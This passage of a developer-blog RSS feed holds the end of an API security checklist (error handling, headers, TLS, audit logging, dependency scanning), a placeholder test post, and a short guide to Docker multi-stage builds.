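        traceback.format_exception(type(exc), exc, exc.__traceback__))
    logger.error("request_id=%s %s", request_id, trace)
    body = {
        "error": "internal_server_error",
        "message": "An unexpected error occurred",
        "request_id": request_id,
    }
    return body, 500
```
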

&lt;h3&gt;
  
  
  11. Security Headers on Every Response
&lt;/h3&gt;

&lt;p&gt;At minimum:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;X-Content-Type-Options: nosniff
X-Frame-Options: DENY
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src 'none'
Cache-Control: no-store
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;Cache-Control: no-store&lt;/code&gt; header matters most for APIs that return sensitive data: it prevents intermediate proxies from caching personal information.&lt;/p&gt;

&lt;h3&gt;
  
  
  12. Response Filtering — Return Only What's Needed
&lt;/h3&gt;

&lt;p&gt;Your internal user object has 40 fields. Your API response should have 8. Never serialize your entire database model to JSON. Use explicit response schemas that whitelist returned fields.&lt;/p&gt;
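&lt;p&gt;Explicit whitelisting is one dict comprehension. A sketch (field names are illustrative):&lt;/p&gt;

```python
PUBLIC_USER_FIELDS = ("id", "name", "email")  # illustrative allow-list

def serialize_user(user):
    """Whitelist-only serialization: fields absent from the allow-list
    (password hashes, internal notes, feature data) can never leak,
    even when new columns are added to the model later."""
    return {k: user[k] for k in PUBLIC_USER_FIELDS if k in user}
```
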

&lt;h2&gt;
  
  
  Infrastructure
&lt;/h2&gt;

&lt;h3&gt;
  
  
  13. TLS Everywhere — No Exceptions
&lt;/h3&gt;

&lt;p&gt;All API traffic must be encrypted. No HTTP fallback. No self-signed certs in production. No TLS 1.0/1.1. Minimum TLS 1.2, prefer 1.3.&lt;/p&gt;

&lt;p&gt;Test with: &lt;code&gt;nmap --script ssl-enum-ciphers -p 443 your-api.com&lt;/code&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  14. Audit Logging for Sensitive Operations
&lt;/h3&gt;

&lt;p&gt;Log every: authentication attempt (success and failure), authorization failure, data access, data modification, and admin action. Include: timestamp, user ID, IP, action, resource, and result.&lt;/p&gt;

&lt;p&gt;These logs are your forensic trail. When (not if) you investigate an incident, they tell you exactly what happened. Store them in append-only storage for at least 12 months.&lt;/p&gt;
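&lt;p&gt;The record format is worth standardizing early. A sketch (the stdout sink stands in for your append-only storage):&lt;/p&gt;

```python
import json
import time

def audit_log(user_id, ip, action, resource, result):
    """Emit one structured line per sensitive operation, with the fields
    listed above. The print() stands in for an append-only log sink."""
    record = {
        "timestamp": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
        "user_id": user_id,
        "ip": ip,
        "action": action,
        "resource": resource,
        "result": result,
    }
    print(json.dumps(record, sort_keys=True))
    return record
```
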

&lt;h3&gt;
  
  
  15. Dependency Scanning in CI/CD
&lt;/h3&gt;

&lt;p&gt;Your code might be secure, but your dependencies might not be. Run automated vulnerability scans on every build:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# GitHub Actions example&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Security scan&lt;/span&gt;
  &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;pip install safety &amp;amp;&amp;amp; safety check&lt;/span&gt;
    &lt;span class="s"&gt;npm audit --audit-level=high&lt;/span&gt;
    &lt;span class="s"&gt;trivy fs --severity HIGH,CRITICAL .&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Block merges with critical vulnerabilities. No exceptions.&lt;/p&gt;

&lt;h2&gt;
  
  
  Real-World Impact: What Happens When You Skip This
&lt;/h2&gt;

&lt;p&gt;We worked with a fintech startup that shipped their payment API without checking items 2, 7, and 10 on this list. Within three months, an attacker discovered the IDOR vulnerability — they could enumerate other users' transaction histories by incrementing the user ID in the URL. The missing rate limiting meant the attacker could scrape thousands of records per minute. And the exposed stack traces in error responses gave them the exact database schema they needed to understand what they were looking at.&lt;/p&gt;

&lt;p&gt;The breach affected 12,000 users. The regulatory fine was six figures. The engineering time to fix, audit, and rebuild trust took four months. The actual security fixes? Three hours. The same three hours they could have spent before launch.&lt;/p&gt;

&lt;p&gt;This isn't unusual. The LiteLLM supply chain attack that hit Hacker News this week (362 points) is another reminder: security isn't something you bolt on after launch. It's either built into your development process or it's a ticking clock.&lt;/p&gt;

&lt;h2&gt;
  
  
  How to Use This Checklist
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Score your API&lt;/strong&gt;: Go through all 15 points. Mark pass/fail for each. Be honest — the only person you're fooling is yourself.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Fix critical first&lt;/strong&gt;: Items 1-6 are critical. If you fail any of these, stop everything and fix them now. These are the vulnerabilities that lead to data breaches.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Automate checks&lt;/strong&gt;: Add items 4, 5, 6, 13, and 15 to your CI/CD pipeline so they can't regress. Security that depends on humans remembering to check is security that will fail.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Schedule quarterly audits&lt;/strong&gt;: Run through the full checklist every quarter. New code introduces new attack surface. New dependencies introduce new vulnerabilities.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Test adversarially&lt;/strong&gt;: Don't just check the box — try to break your own API. Use tools like OWASP ZAP, Burp Suite, or sqlmap against your staging environment. If you're not attacking your own API, someone else will.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The goal isn't a perfect score — it's knowing where your gaps are and having a plan to close them. Every item you fix today is one less vulnerability an attacker can exploit tomorrow.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;&lt;a href="https://www.techsaas.cloud/services/" rel="noopener noreferrer"&gt;TechSaaS&lt;/a&gt; offers comprehensive API security audits. We run your APIs through this checklist (and more), identify vulnerabilities, and help you fix them before attackers find them. If your last security audit was "never," that's exactly why you need one.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>devops</category>
      <category>infosec</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>Test E2E</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Sat, 18 Apr 2026 13:35:58 +0000</pubDate>
      <link>https://forem.com/yash_pritwani_07a77613fd6/test-e2e-5365</link>
      <guid>https://forem.com/yash_pritwani_07a77613fd6/test-e2e-5365</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/getting-started-docker-compose-2026-e2e" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;Test content&lt;/p&gt;

</description>
      <category>test</category>
    </item>
    <item>
      <title>Docker Multi-Stage Builds: A Quick Guide</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Sat, 18 Apr 2026 08:10:43 +0000</pubDate>
      <link>https://forem.com/yash_pritwani_07a77613fd6/docker-multi-stage-builds-a-quick-guide-4d4g</link>
      <guid>https://forem.com/yash_pritwani_07a77613fd6/docker-multi-stage-builds-a-quick-guide-4d4g</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/docker-multi-stage-builds-guide" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;h1&gt;
  
  
  Docker Multi-Stage Builds: A Quick Guide
&lt;/h1&gt;

&lt;p&gt;Docker multi-stage builds let you use multiple &lt;code&gt;FROM&lt;/code&gt; statements in one Dockerfile to produce smaller, more efficient images.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Use Multi-Stage Builds?
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Smaller images&lt;/strong&gt; — Only copy what you need to the final stage&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No build tools in production&lt;/strong&gt; — Compilers, package managers stay in build stage&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Simpler Dockerfiles&lt;/strong&gt; — No need for complex shell scripts to clean up&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Example
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="c"&gt;# Build stage&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s"&gt;node:20&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s"&gt;builder&lt;/span&gt;
&lt;span class="k"&gt;WORKDIR&lt;/span&gt;&lt;span class="s"&gt; /app&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; package*.json ./&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;npm ci
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; . .&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;npm run build

&lt;span class="c"&gt;# Production stage&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="s"&gt; node:20-alpine&lt;/span&gt;
&lt;span class="k"&gt;WORKDIR&lt;/span&gt;&lt;span class="s"&gt; /app&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; --from=builder /app/dist ./dist&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; --from=builder /app/node_modules ./node_modules&lt;/span&gt;
&lt;span class="k"&gt;CMD&lt;/span&gt;&lt;span class="s"&gt; ["node", "dist/index.js"]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This reduces image size from ~1GB to ~150MB.&lt;/p&gt;

&lt;h2&gt;
  
  
  Key Tips
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Use specific base image tags (not &lt;code&gt;latest&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Copy only necessary files with &lt;code&gt;COPY --from=&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Use &lt;code&gt;.dockerignore&lt;/code&gt; to exclude unnecessary files&lt;/li&gt;
&lt;li&gt;Consider &lt;code&gt;distroless&lt;/code&gt; images for even smaller sizes&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://techsaas.cloud" rel="noopener noreferrer"&gt;techsaas.cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

</description>
      <category>docker</category>
      <category>devops</category>
      <category>containers</category>
      <category>tutorial</category>
    </item>
  </channel>
</rss>
